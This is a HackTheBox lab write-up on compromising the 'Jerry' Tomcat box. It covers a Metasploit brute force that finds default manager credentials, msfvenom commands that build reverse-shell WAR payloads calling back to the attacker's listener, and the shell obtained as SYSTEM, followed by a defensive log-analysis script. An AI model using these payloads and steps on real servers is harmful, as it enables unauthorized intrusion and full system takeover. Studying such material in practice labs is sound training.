HackTheBox: Jerry

01/13/2024

This is the third Windows box I'm doing, after [[Blue]] and [[Legacy]]. These are the easiest of the easy as far as Windows boxes go. I'm still basically just blowing through them and looking at the writeup as soon as I get stuck. I don't feel bad about it since I have 0 experience with this OS, so I don't mind getting a boost and just exposing myself to as much as possible.

Enumeration

That was weird. Multiple nmap scans showed the host as being down. I had to run the nmap option to check if host was up using sudo nmap -O 10.10.10.95, which finally showed that port 8080 (http-proxy) was open.

Okay. Let me add jerry and jerry.htb to /etc/hosts and then try navigating to the site.

Exploring the tomcat website

http://jerry.htb:8080 brings us to a Tomcat test page.

Using curl -s http://jerry.htb:8080/docs/ | grep Tomcat, we find that it's running Tomcat 7.0.88.

Let's use Metasploit's Tomcat manager bruteforcer:


msf6 exploit(multi/http/tomcat_jsp_upload_bypass) > use auxiliary/scanner/http/tomcat_mgr_login 

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.10.10.95                                
RHOSTS => 10.10.10.95                                                                                 
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit    

<SNIP>
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
</SNIP>

Note that this success was buried in a sea of failures, as is often the case in life and in computers. Anyway yeah, we got manager creds.

With these, going forward, we can upload a WAR file and gain RCE or a revshell.

Getting RCE through the manager page

I'm in to the manager page with the credentials tomcat:s3cret.

We get some juicy details about the target system from this page:

- Windows Server 2012 R2
- Windows OS 6.3
- amd64
- Hostname: JERRY

I may as well learn how to use msfvenom to generate a WAR shell. We'll resort to trusty tldr:


$ tldr msfvenom

  List payloads:

      msfvenom -l payloads

  List formats:

      msfvenom -l formats

Let's first see what formats we can choose from:


$ msfvenom -l formats

Framework Executable Formats [--format <value>]    
===============================================                          
    Name               
    ----                                           
    asp                                        
    aspx                                       
    aspx-exe                                       
    axis2     
    dll    
    ducky-script-psh
    elf   
    elf-so  
    exe       
    exe-only
    exe-service     
    exe-small
    hta-psh
    jar          
    jsp     
    loop-vbs                                       
    macho                                          
    msi                                                                                               
    msi-nouac    
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

"war" is going to be the format we want, which I know from past experience with Tomcat (from Thales, which was the very first box I did on my own). It's some kind of Java-based archive, but I don't remember exactly what it stands for.

So it looks like we'll want to use --format war in the command.

Now let's see what payloads we have at our disposal:


$ msfvenom -l payloads

<SNIP>
cmd/windows/powershell/meterpreter/reverse_tcp
</SNIP>
<SNIP>
windows/x64/meterpreter/reverse_tcp
</SNIP>

One of these two should work.

Back to tldr, it shows an example of generating a file as follows:


Create an EXE binary with a reverse TCP handler:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f exe -o path/to/binary.exe

We'll tweak this slightly to meet our needs. We swap exe for war and plug in our host details:


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war -o ./payload.war

Then run msfconsole, and start a payload-less listener using use exploit/multi/handler, then set the LHOST and LPORT options, and run exploit to start it.

Now we have to upload the malicious file to the Tomcat server. We navigate to the List Applications tab, and then scroll down to the "WAR file to deploy". Upload the newly-created malicious file.

No luck.

After a bunch of trial and error, I wound up having success with this shell I found online by googling "msfvenom webshell":



msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Then I ran the exploit/multi/handler in msfconsole to set up a meterpreter listener.

Then I uploaded the shell.war file and FINALLY got a shell:


msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.24:4444 
[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.95:49192) at 2023-10-13 17:55:50 -0400


Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----
          

C:\apache-tomcat-7.0.88>pwd
pwd

C:\apache-tomcat-7.0.88>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\apache-tomcat-7.0.88

06/19/2018  04:07 AM    <DIR>          .
06/19/2018  04:07 AM    <DIR>          ..
06/19/2018  04:06 AM    <DIR>          bin
06/19/2018  06:47 AM    <DIR>          conf
06/19/2018  04:06 AM    <DIR>          lib
05/07/2018  02:16 PM            57,896 LICENSE
10/14/2023  06:39 AM    <DIR>          logs
05/07/2018  02:16 PM             1,275 NOTICE
05/07/2018  02:16 PM             9,600 RELEASE-NOTES
05/07/2018  02:16 PM            17,454 RUNNING.txt
06/19/2018  04:06 AM    <DIR>          temp
10/14/2023  07:55 AM    <DIR>          webapps
06/19/2018  04:34 AM    <DIR>          work
               4 File(s)         86,225 bytes
               9 Dir(s)   2,364,530,688 bytes free

C:\apache-tomcat-7.0.88>

and here's the best part:


C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
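
Seen from the defender's side, the manager login brute force and the WAR upload described above both leave traces in Tomcat's access log. The following is an added example, not part of the original writeup: it scans lines in the AccessLogValve "common" pattern and flags a manager login that follows a burst of 401s, plus any POST to /manager/html/upload. The log lines, the threshold and the analyze() helper are constructed for illustration.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
FAIL_THRESHOLD = 5  # assumed tuning value: 401s from one host before a login is suspicious

def analyze(lines, threshold=FAIL_THRESHOLD):
    """Return findings for manager brute force and WAR deployment (hypothetical helper)."""
    fails = defaultdict(int)   # 401s on /manager/ per client since its last success
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not m["path"].startswith("/manager/"):
            continue
        host, user, status = m["host"], m["user"], int(m["status"])
        path = m["path"].split("?", 1)[0]   # drop the CSRF nonce query string
        if status == 401:
            fails[host] += 1
        elif status == 200 and user != "-":
            if fails[host] >= threshold:
                findings.append(("login_after_bruteforce", host, user, fails[host]))
            fails[host] = 0
            # The manager page's "WAR file to deploy" form posts to this path
            if m["method"] == "POST" and path == "/manager/html/upload":
                findings.append(("war_deploy", host, user, m["ts"]))
    return findings

# Constructed sample log (not captured from the box)
SAMPLE_LOG = (
    ['10.10.14.24 - - [13/Oct/2023:17:40:%02d -0400] "GET /manager/html HTTP/1.1" 401 2536' % s
     for s in range(6)]
    + ['10.10.14.24 - tomcat [13/Oct/2023:17:40:07 -0400] "GET /manager/html HTTP/1.1" 200 17642',
       '10.10.14.24 - tomcat [13/Oct/2023:17:54:31 -0400] '
       '"POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 18010',
       '192.0.2.10 - - [13/Oct/2023:18:02:11 -0400] "GET /manager/html HTTP/1.1" 401 2536',
       '192.0.2.10 - admin [13/Oct/2023:18:02:15 -0400] "GET /manager/html HTTP/1.1" 200 17642']
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A per-host counter like this misses slow or distributed guessing, so treat any manager login or WAR deployment from an unexpected address as worth a look on its own.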